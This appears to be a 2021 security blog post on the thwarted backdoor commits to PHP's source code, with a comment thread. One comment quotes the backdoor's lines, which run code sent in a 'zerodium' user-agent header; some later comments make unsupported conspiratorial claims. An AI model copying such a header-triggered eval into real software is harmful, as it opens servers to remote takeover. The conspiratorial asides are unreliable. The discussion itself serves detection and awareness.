Backdoor Added — But Found — in PHP

Unknown hackers attempted to add a backdoor to the PHP source code. It was two malicious commits, with the subject “fix typo” and the names of known PHP developers and maintainers. They were discovered and removed before being pushed out to any users. But since 79% of the Internet’s websites use PHP, it’s scary.

Developers have moved PHP to GitHub, which has better authentication. Hopefully it will be enough — PHP is a juicy target.

Posted on April 9, 2021 at 8:54 AM17 Comments

Comments

Joe April 9, 2021 9:39 AM

So looking at the explanation, the malicious code consisted of a line that checks if the browsers useragent header starts with the string “zerodium”

if (strstr(Z_STRVAL_P(enc), “zerodium”)) {

If that is the case, it then tries to execute the contents of the useragent (the part that follows the “zerodium” string)

zend_eval_string(Z_STRVAL_P(enc)+8

Considering the attempt to use “zend_eval_string” isn’t this something that could be easily flagged with automated code scanning tools?

Security Sam April 9, 2021 10:20 AM

Within each and every edifice
We need to check each orifice
For a backdoor nook and cranny
To expose each crook and nanny.

JonKnowsNothing April 9, 2021 1:09 PM

@Security Sam

re:
Within each and every edifice
We need to check each orifice
For a backdoor nook and cranny
To expose each crook and nanny.

In the pie the black birds crow
for evil maids all in a row (1)

===

ht tps://www.theguardian.com/world/2021/apr/09/saudi-arabia-jails-alleged-satirist-identified-in-twitter-infiltration

Saudi Arabia jails alleged satirist ‘identified in Twitter infiltration’
Activist claims 2014 breach led to aid worker being sentenced to 20 years over parody account

… the infiltration of Twitter by agents of the Saudi government in 2014 and 2015. The connection was first reported by Bloomberg in 2020.

The US Department of Justice in 2019 charged three Saudi nationals with illegally accessing private information of “certain” Twitter users accounts and providing information about the accounts to Saudi officials.

Two of the Saudis who were charged were Twitter employees who, the DoJ alleged, used their employment to access information about Twitter users who were critical of the Saudi government. The two former employees are believed to be in Saudi and were not apprehended by the US.

1, ht tps://en.wikipedia.org/wiki/Sing_a_Song_of_Sixpence

  • Four and twenty Naughty Boys,
    Baked in a Pye.

(url fractured to prevent autorun)

xcv April 9, 2021 4:03 PM

Did you know PHP is free and open source software, with some Israeli origins? And yes it does run most of the world’s websites.

Developers have moved PHP to GitHub, which has better authentication. Hopefully it will be enough — PHP is a juicy target.

But now GitHub is owned by Microsoft — with a heavy-handed intellectual property agenda of misappropriating free software after using vice and extortion to force developers of unwanted competing FOSS products to abandon their projects.

And in other news, Joe Biden has announced a heavy-handed intellectual property crackdown on free and open source software particularly with CNC and other manufacturing machinery in order to prevent DMCA circumvention for the possibly illicit manufacture of “ghost gun” parts with Polymer80 plastic on 3-D printers.

https://www.reuters.com/article/us-usa-guns/biden-plans-to-crack-down-on-ghost-guns-with-action-on-thursday-idUSKBN2BU2QP

Weather April 9, 2021 5:49 PM

@xcv
Abs plastic has the highest tensile strength, which encposs compression, tension and shear.
Its just another movie plot threat, half the gun has to be made of gun metal, apart from the handle.
Php Apache hosted by Microsoft, is that entrapment, I know Mac is Unix based, maybe they are heading down the same path, not necessarily bad.

Clive Robinson April 9, 2021 6:47 PM

@ Joe, ALL,

Considering the attempt to use “zend_eval_string” isn’t this something that could be easily flagged with automated code scanning tools?

Yes, even a simple edit search would find it…

Which begs the question “why use it”…

In most scripting languages “eval” or it’s equivalent has a very high thus noticable overhead[1] in several respects –memory, execution time etc– due to it’s “jack of all trades” nature it’s inefficient. So it would also most likely show up in profiling the code when testing.

As most times what the eval is being used for can be more efficiently done other ways is odd, and would raise an eyebrow in an experienced programmer. Likewise the plaintext of the string used for comparison, it would be trivial to obfuscate it to make it look a lot less like a backdoor.

When you add to it the fact that it’s also been done with no other attempt at subterfuge is further suggestive and I’m sure some people are thinking,

“Did the perp want it to be found?”

Which might actually be the case. Which would be food for thought for a sufficiently enquiring mind.

The fact it was easily found could be argued that this was proof that it was there to be found easily… However that’s a form of unwaranted circular reasoning that gets you nowhere very slowly.

Likewise it could be argued that the moving of the code base proves that it was there to be found easily thus precipitate the move. Whilst that may be true, again it’s arguing after the fact in another form of circular reasoning.

Thus the “Why so obvious?” question will remain unanswered unless the perp says what they were upto, or some further action acts in an indicative way.

Remember even with what looks like indisputable facts,

“Attribution can be hard very hard”

Also you should always argue from “Cause to Effect” not the otherway, a mistake a lot of people make when investigating events[2]…

[1] For instance those that write *nix shell scripts either know or assumes it kicks of an entire new shell process with all the overhead that requires.

[2] People who should know better often argue backwards from effect to cause, and do not see why this is wrong… Well consider this, if you hit a golfball from the tee with a club and it lands on the fairway, in most cases it is going to end up sitting on a tuft of grass. However it should be easy to see that finding a golfball on a tuft of grass on a fairway does not mean it got there by being struck with a golf club, or that it was done so at the tee.

xcv April 9, 2021 7:39 PM

@ Weather

Abs plastic has the highest tensile strength, which encposs compression, tension and shear.
Its just another movie plot threat, half the gun has to be made of gun metal, apart from the handle.
The “movie plot” threat is the copyright and the DMCA stuff, with the FBI warning on all the movie trailers.

As far as real guns go, a barrel, chamber, and a firing pin need to be made of metal or some equivalent strength material for the gun. Everything else can presumably be made of plastic, and I believe there are perfectly serviceable “undetectable” guns with barrels and chambers made of non-metallic high-tensile wound fiberglass-ceramic composite.

Php Apache hosted by Microsoft, is that entrapment, I know Mac is Unix based, maybe they are heading down the same path, not necessarily bad.

You’ve got SCO — and that’s the Santa Cruz Operation, not the Shanghai Cooperation Organisation as currently reported — with that Apple Unix stuff — that’s a whole other long-running brutal Microsoft-funded mental health intellectual property crackdown on Free and Open Source Software. (Remember http://groklaw.net/ from way back when?)

Clive Robinson April 10, 2021 6:29 AM

@ xcv,

You’ve got SCO … that’s a whole other long-running brutal Microsoft-funded mental health intellectual property crackdown on Free and Open Source Software.

Yes and as I mentioned just a few days back I was supprised to find that not only was the legal cases against IBM not resolved, they have been started up yet again by the company that bought out that part of SCO, and they appear to be getting funding from somewhere…

You can read the background of SCO v IBM up untill about 2018 here, note Linus’s “white trash” comment it should raise a smile,

https://en.m.wikipedia.org/wiki/SCO_v_IBM

As for the latest round, well it realy should have been time barred long ago, but there is a loop hole in that a judge stayed it when SCO went into bankruptcy, apparently no time limit was put on the length of time for that process to complete…

For a brief comment on the latest blood lust zombie fantasy game with the dead hand now being backward “suou niX” the actual funders remain hidden,

https://www.theregister.com/2021/04/06/xinuous/

Will Xinuous or it’s backers win? Well last time when it was pre-bankrupt SCO blowing 50million of investors money having a fine old time struting in front of cameras biging it up and grabbing big salaries and expense accounts they lost the lot. There is more at,

https://www.theregister.com/2021/03/31/ibm_redhat_xinuos/

However as we know a big chunk of that small change was Microsoft’s, but… They appear to have gone down the “embrace and extend” route with the German Federally protected version of Linux…

So whilst I would not rule them out as investors / backers of Xinuous, You have to consider that to Microsoft now, Linux or atleast the legally protected by German federal Government version is nolonger a cancer…

So could this be realy a new varient on Microsoft v IBM, but as a proxie war? Well it would not be the first time, nor do I expect it to be the last time for that they are after all two of the largest IT orgs out there. Some have indicated IBM apparently going “all in” on Open Source wrong footed Microsoft, thus caused Microsoft to in part adopt some Open Sourceness into it’s culture (over and above nicking BSD code for it’s entire networking stack).

xcv April 10, 2021 11:57 AM

There is indeed a hostile Microsoft insurgency. The Santa Cruz Operation is back in full force with PHP and other FOSS projects held hostage on GitHub: investopedia.com is now (apparently) running on Microsoft® Active® Server® Pages®.

xcv April 10, 2021 1:40 PM

@ Clive Robinson

the German Federally protected version of Linux…

Are you referring to NSA’s SELinux with the MLS/MCS architecture?

MLS or “Multi-Level Security” corresponds very closely to the NSA’s “usual” security levels of FOUO // Confidential // Secret // Top Secret.

There is also a “MCS” or “Multi-Category Security” component to the system which corresponds to “Sensitive Compartmented Information” at the NSA.

But the whole H.R. system of the U.S. federal government (Office of Personnel Management) has been under German control in a SAP database, which probably does run on a Red Hat Enterprise Linux (RHEL) system. It is reportedly unclassified by the U.S. government, though. FOUO? They have to release all those records to perform background checks for the purpose of filing felony charges against peons, deemed social undesirables, adjudicated mental defectives, and prohibited U.S. subjects who attempt to purchase an otherwise legal firearm under the Second Amendment.

Clive Robinson April 10, 2021 4:00 PM

@ xcv,

Are you referring to NSA’s SELinux with the MLS/MCS architecture?

Err no, to SUSE Linux.

They took SCO to court in Germany for basically spreading malicious falsehoods. The German court thus handed down the equivalent of perpetual freedom from SCO or it’s successors. Making it clear SUSE does not contain any SCO copyrighted code. It’s mentioned in one of the links I gave.

In essence SCO or it’s successors have no rights what so ever over SUSE Linux and can not take action against them in any way related to their software. If they try it on they get fined in Germany a daily rate up in the hundreds of thousands of euro’s and it apparently applys world wide via WTO regulations (fun side note if Obama’s Transalantic Trade Partnership treaty had gone through, then SUSE would have be able to sue under the Interstate Trade Dispute section, and that could have cost the US Gov hundreds of millions of dollars).

Thus Microsoft (using SUSE) unlike IBM (using RedHat) are effectively free and clear of any SCO or successor “our code nonsense”.

But Microsoft have a second string to their bow… Anyonr remember Xinix? It was Microsoft under contract to AT&T porting Unix to the 286… Only Microsoft did not do it they subbed it out to three guys in a garage in California who had lots of pretentions and called themselves “The Santa Cruse Operation”. As it happens Microsoft under the contract with AT&T not only retain copyright but also a slice of any AT&T Unix code sold for Intel CPU’s as royalties…

It’s something you very rarely hear about since the “Linux is cancer” rantings of “baldilocks” employee number 30 or what ever Steve “Barmy” Balma was.

insec April 11, 2021 5:01 AM

AlexT
To be honest the whole thing reads more like a prank than anything else

Simplicity-wise, yes. But with potentially far reaching consequences. Maybe it was just a “test to see if the maintainers paid any attention”.

@JonKnowsNothing April 11, 2021 9:05 AM

Jean Valjean served a prison sentence of twenty years hard labor for stealing a loaf bread to feed his sister’s children during a time of economic depression

Alex Bodryk April 12, 2021 4:10 AM

How to solve this problem – embed SAST right into Github?
If we’ve got volunteer devs why we can’t get volunteer appsec pros that would triage findings at least in fundamental open-source tech?

Peter A. April 13, 2021 4:53 AM

@Clive Robinson: XENIX! Ah, splendid memories of the past… It was the first U*X I got my hands on, right on my first year at the university. There was an N-teen seat installation (can’t remember the number exactly now, but surely below 20) on a then state-of the-art Intel 486 box (25 MHZ?) with 12 MB of RAM, multiserial card and quite nice paper-white CRT character terminals (looked like Wyse a bit but there were different brand, Falco IIRC). Those happy hacking days… I often camped there with friends till 9 p.m. when the janitor threw us out to close the department building for the night (good for me, the last bus home departed at 9.23).

To this day I sometimes joke Microsoft once new how to make operating systems, but then sold it off.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.